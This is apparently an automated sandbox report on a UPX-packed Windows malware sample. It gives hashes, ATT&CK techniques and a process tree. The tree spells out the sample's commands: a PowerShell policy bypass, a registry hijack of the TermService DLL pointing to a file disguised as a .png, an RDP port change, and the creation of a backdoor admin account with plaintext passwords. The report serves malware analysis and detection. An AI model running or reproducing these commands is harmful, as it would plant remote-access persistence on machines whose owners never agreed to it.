5a79eba3f9e0e2ab3982c4512195f3f9e4b7b7f56b8993cfff69dfb47567bbe5

General

Target

5a79eba3f9e0e2ab3982c4512195f3f9e4b7b7f56b8993cfff69dfb47567bbe5.exe
Size

3.1MB
MD5

51c65f4486f9c76e90e3cde6a29f552d
SHA1

cef1e7f6317a2f49836b9012c6396a7765516b6d
SHA256

5a79eba3f9e0e2ab3982c4512195f3f9e4b7b7f56b8993cfff69dfb47567bbe5
SHA512

49b3336b62a41facafa6aa37bffa1f467bab8ff5effc4eede9966baa7fcfba613a2b51f979d9fce324324fa76f8d664fde83cf609996e9436f9b4c0d0a28a824

Score

9^/10

persistence upx

Malware Config

Signatures

Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098
Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1076
Sets DLL path for service in the registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
\Windows\Branding\mediasrv.png	upx
\Windows\Branding\mediasvc.png	upx

Loads dropped DLL 2 IoCs

Processes:

pid process

2804
2804

pid	process
2804
2804

Modifies service 2 TTPs 2 IoCs

persistence

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\parameters	reg.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png"	reg.exe

Drops file in Windows directory 8 IoCs

Processes:

powershell.exe

description	ioc	process
File created	C:\Windows\branding\mediasvc.png	powershell.exe
File created	C:\Windows\branding\wupsvc.jpg	powershell.exe
File opened for modification	C:\Windows\branding\Basebrd	powershell.exe
File opened for modification	C:\Windows\branding\ShellBrd	powershell.exe
File opened for modification	C:\Windows\branding\mediasrv.png	powershell.exe
File opened for modification	C:\Windows\branding\mediasvc.png	powershell.exe
File opened for modification	C:\Windows\branding\wupsvc.jpg	powershell.exe
File created	C:\Windows\branding\mediasrv.png	powershell.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

2428 reg.exe
Runs net.exe

pid	process
2428	reg.exe

Suspicious behavior: EnumeratesProcesses 15 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

pid	process
788	powershell.exe
788	powershell.exe
788	powershell.exe
4336	powershell.exe
4336	powershell.exe
4336	powershell.exe
1868	powershell.exe
1868	powershell.exe
4476	powershell.exe
1868	powershell.exe
4476	powershell.exe
4476	powershell.exe
788	powershell.exe
788	powershell.exe
788	powershell.exe

Suspicious behavior: LoadsDriver 2 IoCs

Processes:

pid process

624
624

pid	process
624
624

Suspicious use of AdjustPrivilegeToken 67 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	788	powershell.exe
Token: SeDebugPrivilege	4336	powershell.exe
Token: SeDebugPrivilege	1868	powershell.exe
Token: SeDebugPrivilege	4476	powershell.exe
Token: SeIncreaseQuotaPrivilege	4336	powershell.exe
Token: SeSecurityPrivilege	4336	powershell.exe
Token: SeTakeOwnershipPrivilege	4336	powershell.exe
Token: SeLoadDriverPrivilege	4336	powershell.exe
Token: SeSystemProfilePrivilege	4336	powershell.exe
Token: SeSystemtimePrivilege	4336	powershell.exe
Token: SeProfSingleProcessPrivilege	4336	powershell.exe
Token: SeIncBasePriorityPrivilege	4336	powershell.exe
Token: SeCreatePagefilePrivilege	4336	powershell.exe
Token: SeBackupPrivilege	4336	powershell.exe
Token: SeRestorePrivilege	4336	powershell.exe
Token: SeShutdownPrivilege	4336	powershell.exe
Token: SeDebugPrivilege	4336	powershell.exe
Token: SeSystemEnvironmentPrivilege	4336	powershell.exe
Token: SeRemoteShutdownPrivilege	4336	powershell.exe
Token: SeUndockPrivilege	4336	powershell.exe
Token: SeManageVolumePrivilege	4336	powershell.exe
Token: 33	4336	powershell.exe
Token: 34	4336	powershell.exe
Token: 35	4336	powershell.exe
Token: 36	4336	powershell.exe
Token: SeIncreaseQuotaPrivilege	4476	powershell.exe
Token: SeSecurityPrivilege	4476	powershell.exe
Token: SeTakeOwnershipPrivilege	4476	powershell.exe
Token: SeLoadDriverPrivilege	4476	powershell.exe
Token: SeSystemProfilePrivilege	4476	powershell.exe
Token: SeSystemtimePrivilege	4476	powershell.exe
Token: SeProfSingleProcessPrivilege	4476	powershell.exe
Token: SeIncBasePriorityPrivilege	4476	powershell.exe
Token: SeCreatePagefilePrivilege	4476	powershell.exe
Token: SeBackupPrivilege	4476	powershell.exe
Token: SeRestorePrivilege	4476	powershell.exe
Token: SeShutdownPrivilege	4476	powershell.exe
Token: SeDebugPrivilege	4476	powershell.exe
Token: SeSystemEnvironmentPrivilege	4476	powershell.exe
Token: SeRemoteShutdownPrivilege	4476	powershell.exe
Token: SeUndockPrivilege	4476	powershell.exe
Token: SeManageVolumePrivilege	4476	powershell.exe
Token: 33	4476	powershell.exe
Token: 34	4476	powershell.exe
Token: 35	4476	powershell.exe
Token: 36	4476	powershell.exe
Token: SeIncreaseQuotaPrivilege	1868	powershell.exe
Token: SeSecurityPrivilege	1868	powershell.exe
Token: SeTakeOwnershipPrivilege	1868	powershell.exe
Token: SeLoadDriverPrivilege	1868	powershell.exe
Token: SeSystemProfilePrivilege	1868	powershell.exe
Token: SeSystemtimePrivilege	1868	powershell.exe
Token: SeProfSingleProcessPrivilege	1868	powershell.exe
Token: SeIncBasePriorityPrivilege	1868	powershell.exe
Token: SeCreatePagefilePrivilege	1868	powershell.exe
Token: SeBackupPrivilege	1868	powershell.exe
Token: SeRestorePrivilege	1868	powershell.exe
Token: SeShutdownPrivilege	1868	powershell.exe
Token: SeDebugPrivilege	1868	powershell.exe
Token: SeSystemEnvironmentPrivilege	1868	powershell.exe
Token: SeRemoteShutdownPrivilege	1868	powershell.exe
Token: SeUndockPrivilege	1868	powershell.exe
Token: SeManageVolumePrivilege	1868	powershell.exe
Token: 33	1868	powershell.exe

Suspicious use of WriteProcessMemory 70 IoCs

Processes:

5a79eba3f9e0e2ab3982c4512195f3f9e4b7b7f56b8993cfff69dfb47567bbe5.exepowershell.execsc.exenet.execmd.execmd.exenet.execmd.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.exe

description	pid	process	target process
PID 4696 wrote to memory of 788	4696	5a79eba3f9e0e2ab3982c4512195f3f9e4b7b7f56b8993cfff69dfb47567bbe5.exe	powershell.exe
PID 4696 wrote to memory of 788	4696	5a79eba3f9e0e2ab3982c4512195f3f9e4b7b7f56b8993cfff69dfb47567bbe5.exe	powershell.exe
PID 788 wrote to memory of 964	788	powershell.exe	csc.exe
PID 788 wrote to memory of 964	788	powershell.exe	csc.exe
PID 964 wrote to memory of 3256	964	csc.exe	cvtres.exe
PID 964 wrote to memory of 3256	964	csc.exe	cvtres.exe
PID 788 wrote to memory of 4336	788	powershell.exe	powershell.exe
PID 788 wrote to memory of 4336	788	powershell.exe	powershell.exe
PID 788 wrote to memory of 1868	788	powershell.exe	powershell.exe
PID 788 wrote to memory of 1868	788	powershell.exe	powershell.exe
PID 788 wrote to memory of 4476	788	powershell.exe	powershell.exe
PID 788 wrote to memory of 4476	788	powershell.exe	powershell.exe
PID 788 wrote to memory of 2356	788	powershell.exe	reg.exe
PID 788 wrote to memory of 2356	788	powershell.exe	reg.exe
PID 788 wrote to memory of 2428	788	powershell.exe	reg.exe
PID 788 wrote to memory of 2428	788	powershell.exe	reg.exe
PID 788 wrote to memory of 2836	788	powershell.exe	reg.exe
PID 788 wrote to memory of 2836	788	powershell.exe	reg.exe
PID 788 wrote to memory of 2604	788	powershell.exe	net.exe
PID 788 wrote to memory of 2604	788	powershell.exe	net.exe
PID 2604 wrote to memory of 3856	2604	net.exe	net1.exe
PID 2604 wrote to memory of 3856	2604	net.exe	net1.exe
PID 788 wrote to memory of 4668	788	powershell.exe	cmd.exe
PID 788 wrote to memory of 4668	788	powershell.exe	cmd.exe
PID 4668 wrote to memory of 2600	4668	cmd.exe	cmd.exe
PID 4668 wrote to memory of 2600	4668	cmd.exe	cmd.exe
PID 2600 wrote to memory of 4660	2600	cmd.exe	net.exe
PID 2600 wrote to memory of 4660	2600	cmd.exe	net.exe
PID 4660 wrote to memory of 4216	4660	net.exe	net1.exe
PID 4660 wrote to memory of 4216	4660	net.exe	net1.exe
PID 788 wrote to memory of 196	788	powershell.exe	cmd.exe
PID 788 wrote to memory of 196	788	powershell.exe	cmd.exe
PID 196 wrote to memory of 212	196	cmd.exe	cmd.exe
PID 196 wrote to memory of 212	196	cmd.exe	cmd.exe
PID 212 wrote to memory of 4360	212	cmd.exe	net.exe
PID 212 wrote to memory of 4360	212	cmd.exe	net.exe
PID 4360 wrote to memory of 4504	4360	net.exe	net1.exe
PID 4360 wrote to memory of 4504	4360	net.exe	net1.exe
PID 2760 wrote to memory of 1432	2760	cmd.exe	net.exe
PID 2760 wrote to memory of 1432	2760	cmd.exe	net.exe
PID 1432 wrote to memory of 1044	1432	net.exe	net1.exe
PID 1432 wrote to memory of 1044	1432	net.exe	net1.exe
PID 4724 wrote to memory of 4532	4724	cmd.exe	net.exe
PID 4724 wrote to memory of 4532	4724	cmd.exe	net.exe
PID 4532 wrote to memory of 5064	4532	net.exe	net1.exe
PID 4532 wrote to memory of 5064	4532	net.exe	net1.exe
PID 4008 wrote to memory of 3000	4008	cmd.exe	net.exe
PID 4008 wrote to memory of 3000	4008	cmd.exe	net.exe
PID 3000 wrote to memory of 4128	3000	net.exe	net1.exe
PID 3000 wrote to memory of 4128	3000	net.exe	net1.exe
PID 740 wrote to memory of 1736	740	cmd.exe	net.exe
PID 740 wrote to memory of 1736	740	cmd.exe	net.exe
PID 1736 wrote to memory of 4056	1736	net.exe	net1.exe
PID 1736 wrote to memory of 4056	1736	net.exe	net1.exe
PID 2528 wrote to memory of 3220	2528	cmd.exe	net.exe
PID 2528 wrote to memory of 3220	2528	cmd.exe	net.exe
PID 3220 wrote to memory of 1916	3220	net.exe	net1.exe
PID 3220 wrote to memory of 1916	3220	net.exe	net1.exe
PID 3364 wrote to memory of 516	3364	cmd.exe	net.exe
PID 3364 wrote to memory of 516	3364	cmd.exe	net.exe
PID 516 wrote to memory of 500	516	net.exe	net1.exe
PID 516 wrote to memory of 500	516	net.exe	net1.exe
PID 788 wrote to memory of 4456	788	powershell.exe	cmd.exe
PID 788 wrote to memory of 4456	788	powershell.exe	cmd.exe

C:\Users\Admin\AppData\Local\Temp\5a79eba3f9e0e2ab3982c4512195f3f9e4b7b7f56b8993cfff69dfb47567bbe5.exe
"C:\Users\Admin\AppData\Local\Temp\5a79eba3f9e0e2ab3982c4512195f3f9e4b7b7f56b8993cfff69dfb47567bbe5.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4696

\??\c:\windows\System32\WindowsPowerShell\v1.0\powershell.exe
-ep bypass -noexit -f C:\Users\Admin\AppData\Local\Temp\get-points.ps1
2⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:788

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4jmr4dcp\4jmr4dcp.cmdline"
3⤵
- Suspicious use of WriteProcessMemory
PID:964

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5D1A.tmp" "c:\Users\Admin\AppData\Local\Temp\4jmr4dcp\CSC905120C247747DEA9963A2237925014.TMP"
4⤵
PID:3256

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4336

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1868

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4476

C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
3⤵
PID:2356

C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
3⤵
- Modifies service
- Modifies registry key
PID:2428

C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
3⤵
PID:2836

C:\Windows\system32\net.exe
"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
3⤵
- Suspicious use of WriteProcessMemory
PID:2604

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
4⤵
PID:3856

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
3⤵
- Suspicious use of WriteProcessMemory
PID:4668

C:\Windows\system32\cmd.exe
cmd /c net start rdpdr
4⤵
- Suspicious use of WriteProcessMemory
PID:2600

C:\Windows\system32\net.exe
net start rdpdr
5⤵
- Suspicious use of WriteProcessMemory
PID:4660

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start rdpdr
6⤵
PID:4216

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
3⤵
- Suspicious use of WriteProcessMemory
PID:196

C:\Windows\system32\cmd.exe
cmd /c net start TermService
4⤵
- Suspicious use of WriteProcessMemory
PID:212

C:\Windows\system32\net.exe
net start TermService
5⤵
- Suspicious use of WriteProcessMemory
PID:4360

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start TermService
6⤵
PID:4504

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
3⤵
PID:4456

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
3⤵
PID:4352

C:\Windows\System32\cmd.exe
cmd /C net.exe user wgautilacc Ghar4f5 /del
1⤵
- Suspicious use of WriteProcessMemory
PID:2760

C:\Windows\system32\net.exe
net.exe user wgautilacc Ghar4f5 /del
2⤵
- Suspicious use of WriteProcessMemory
PID:1432

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user wgautilacc Ghar4f5 /del
3⤵
PID:1044

C:\Windows\System32\cmd.exe
cmd /C net.exe user wgautilacc DufU7S2t /add
1⤵
- Suspicious use of WriteProcessMemory
PID:4724

C:\Windows\system32\net.exe
net.exe user wgautilacc DufU7S2t /add
2⤵
- Suspicious use of WriteProcessMemory
PID:4532

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user wgautilacc DufU7S2t /add
3⤵
PID:5064

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
1⤵
- Suspicious use of WriteProcessMemory
PID:4008

C:\Windows\system32\net.exe
net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
2⤵
- Suspicious use of WriteProcessMemory
PID:3000

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
3⤵
PID:4128

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" EWYCRADZ$ /ADD
1⤵
- Suspicious use of WriteProcessMemory
PID:740

C:\Windows\system32\net.exe
net.exe LOCALGROUP "Remote Desktop Users" EWYCRADZ$ /ADD
2⤵
- Suspicious use of WriteProcessMemory
PID:1736

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" EWYCRADZ$ /ADD
3⤵
PID:4056

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD
1⤵
- Suspicious use of WriteProcessMemory
PID:2528

C:\Windows\system32\net.exe
net.exe LOCALGROUP "Administrators" wgautilacc /ADD
2⤵
- Suspicious use of WriteProcessMemory
PID:3220

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD
3⤵
PID:1916

C:\Windows\System32\cmd.exe
cmd /C net.exe user wgautilacc DufU7S2t
1⤵
- Suspicious use of WriteProcessMemory
PID:3364

C:\Windows\system32\net.exe
net.exe user wgautilacc DufU7S2t
2⤵
- Suspicious use of WriteProcessMemory
PID:516

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user wgautilacc DufU7S2t
3⤵
PID:500

C:\Windows\System32\cmd.exe
cmd.exe /C net user wgautilacc 1234
1⤵
PID:4804

C:\Windows\system32\net.exe
net user wgautilacc 1234
2⤵
PID:1180

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user wgautilacc 1234
3⤵
PID:1328

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Account Manipulation

1

T1098

Registry Run Keys / Startup Folder

1

T1060

Modify Existing Service

1

T1031

Privilege Escalation

Defense Evasion

Modify Registry

3

T1112

Credential Access

Discovery

Lateral Movement

Remote Desktop Protocol

1

T1076

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\4jmr4dcp\4jmr4dcp.dll
MD5
8bf6ce10fdcd686c31752f455daae42b

SHA1
ee939cd35808e0faa0b7d91ffc797be9c95d105e

SHA256
e4857585601f7b44d103fb2c7bd9b2369650c34ccff59d3a34c3f15dc2b44ef8

SHA512
edfe72cc1b9b97b2bba16bc165bf509dc43aa98f24d7db786f677bf76c2853eaf6edf4fed3d8f55c29b9e4bddd053236a26587a1ba9ae6cb2ec1e64ff4225b5d

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES5D1A.tmp
MD5
c9db7dc298ab23f21a51dfc825cbc558

SHA1
935698e89c2f1a5f9e1f8cac7b547c62f0590a6e

SHA256
88c0347eeeedcc292009428eaf62146e93cc23a08ab6ee0fd5fc7ea71c2ef94a

SHA512
0f50d4a9724efb3d97cf286e31fda85284bd405891c40bdc030654b9ac67feb21bcb2207a14e97181fab4c8f92dfbcb701500afa4a5331e1c769d60a0d65479e

Download Submit
C:\Users\Admin\AppData\Local\Temp\get-points.ps1
MD5
41d1a9d1cbee90f1e5f27fdfb299f8b8

SHA1
1e9ac27006a7c364649265246fccbd719418ceab

SHA256
0f6c089b4cefa4a454150f08519573283b1a38e2c19cd7b04855a05d686d41b4

SHA512
f178f88d0491cf72c3d4d591ab1d428691474a4c443822a0d270555c9dc4d05932057847b0e7106d564e6c9ddb33c0649e472258afca10696edc3dbb00f33422

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\4jmr4dcp\4jmr4dcp.0.cs
MD5
8e55cb0ca998472ab6d3e295e0c4dd50

SHA1
407d07a29b89fc3afc246c0680d5857e3f51019d

SHA256
63e03eacae29a0d2187103f57a01a5e92ecb3b83a0452e05926303ab57a86685

SHA512
c51982ecdad9a366544cfb68a52808f6a54ed45c1e5b384c0ac5354fe713c18a16c90ee57e0d018caad02f7f293677c62f4c8a9a51bdea143f3afe593172bd28

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\4jmr4dcp\4jmr4dcp.cmdline
MD5
b4f4dcc545f39c308037a5c05758c6d0

SHA1
e3d141afd9f0f061e699e7a12bbda46cc9233620

SHA256
566716c84e1632309a299649cdbb97eb685cd5ef179ce5f0a85315fbe3bdb1e7

SHA512
99db94762d69ac52f5e28cd16062eaf153bb07ea7710a60e7742ed91ed88081f6b98a11130465519eceda6c6e0bf82186661d0047679034ee8a03559fc5e6776

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\4jmr4dcp\CSC905120C247747DEA9963A2237925014.TMP
MD5
67eb21e3a7e0b2d9525c4d8031360b8b

SHA1
7ec0dc857178e2f3c328ca62637b32cf67b70b23

SHA256
614517bde0c2d9ca131c65356ea71af8d89cb097d4fffc7c8c30ac25a88cf4a2

SHA512
c8f5f76cce18bf812f8a746f331d98143ceb6e2521aa589323df27093b7d4c09355b6986692af18bdf3fd9926026bc9764b1aace04aa54cecd1bb7db62cd49b9

Download Submit
\Windows\Branding\mediasrv.png
MD5
37fb7ba711ffbe9d6ebb27d54e827966

SHA1
4d4d9303e011bcb14720b24239a1aacd58122f47

SHA256
81b857da0878a957125253a0a5eb80d64c7ab9826797304813d8ed3c3e7f84c5

SHA512
3f0358b9e7d89fba96e6e9bbe804c26b886a4678a6aa49bc2e784bf180b86c863e3e9a54da71f6856f5b4bb7d28b4e56269dbf31015fdba3b4b808eb66e3aedf

Download Submit
\Windows\Branding\mediasvc.png
MD5
2f916498a393e2f0d008d33a74c062ba

SHA1
404d52d4253ef3843ae3f2c4aff050f37fcd3f08

SHA256
d5038b5227bc35e157dd225c7bb54f0bcf3ba8d8b48cbb930b4ccb65c23d3412

SHA512
d952a820a966c6cadc1750947d053d01e4e6476d074b6cd460555cc9f8417bd7412beebb65cfa8a121edcce9aab110a5909251146fce703d1b4e984788486f10

Download Submit
memory/196-41-0x0000000000000000-mapping.dmp

Download
memory/212-42-0x0000000000000000-mapping.dmp

Download
memory/500-58-0x0000000000000000-mapping.dmp

Download
memory/516-57-0x0000000000000000-mapping.dmp

Download
memory/788-2-0x0000000000000000-mapping.dmp

Download
memory/788-5-0x0000027DFB800000-0x0000027DFB801000-memory.dmp

Filesize
4KB

Download
memory/788-3-0x00007FF8525B0000-0x00007FF852F9C000-memory.dmp

Filesize
9.9MB

Download
memory/788-16-0x0000027DFBEE0000-0x0000027DFBEE1000-memory.dmp

Filesize
4KB

Download
memory/788-19-0x0000027DFC270000-0x0000027DFC271000-memory.dmp

Filesize
4KB

Download
memory/788-15-0x0000027DF8D50000-0x0000027DF8D51000-memory.dmp

Filesize
4KB

Download
memory/788-4-0x0000027DF8CF0000-0x0000027DF8CF1000-memory.dmp

Filesize
4KB

Download
memory/788-6-0x0000027DFBC10000-0x0000027DFBC11000-memory.dmp

Filesize
4KB

Download
memory/964-8-0x0000000000000000-mapping.dmp

Download
memory/1044-48-0x0000000000000000-mapping.dmp

Download
memory/1180-61-0x0000000000000000-mapping.dmp

Download
memory/1328-62-0x0000000000000000-mapping.dmp

Download
memory/1432-47-0x0000000000000000-mapping.dmp

Download
memory/1736-53-0x0000000000000000-mapping.dmp

Download
memory/1868-23-0x0000000000000000-mapping.dmp

Download
memory/1868-25-0x00007FF8525B0000-0x00007FF852F9C000-memory.dmp

Filesize
9.9MB

Download
memory/1916-56-0x0000000000000000-mapping.dmp

Download
memory/2356-32-0x0000000000000000-mapping.dmp

Download
memory/2428-33-0x0000000000000000-mapping.dmp

Download
memory/2600-38-0x0000000000000000-mapping.dmp

Download
memory/2604-35-0x0000000000000000-mapping.dmp

Download
memory/2836-34-0x0000000000000000-mapping.dmp

Download
memory/3000-51-0x0000000000000000-mapping.dmp

Download
memory/3220-55-0x0000000000000000-mapping.dmp

Download
memory/3256-11-0x0000000000000000-mapping.dmp

Download
memory/3856-36-0x0000000000000000-mapping.dmp

Download
memory/4056-54-0x0000000000000000-mapping.dmp

Download
memory/4128-52-0x0000000000000000-mapping.dmp

Download
memory/4216-40-0x0000000000000000-mapping.dmp

Download
memory/4336-20-0x0000000000000000-mapping.dmp

Download
memory/4336-21-0x00007FF8525B0000-0x00007FF852F9C000-memory.dmp

Filesize
9.9MB

Download
memory/4352-60-0x0000000000000000-mapping.dmp

Download
memory/4360-43-0x0000000000000000-mapping.dmp

Download
memory/4456-59-0x0000000000000000-mapping.dmp

Download
memory/4476-29-0x00007FF8525B0000-0x00007FF852F9C000-memory.dmp

Filesize
9.9MB

Download
memory/4476-27-0x0000000000000000-mapping.dmp

Download
memory/4504-44-0x0000000000000000-mapping.dmp

Download
memory/4532-49-0x0000000000000000-mapping.dmp

Download
memory/4660-39-0x0000000000000000-mapping.dmp

Download
memory/4668-37-0x0000000000000000-mapping.dmp

Download
memory/4696-1-0x0000000000CE0000-0x0000000000CE1000-memory.dmp

Filesize
4KB

Download
memory/5064-50-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads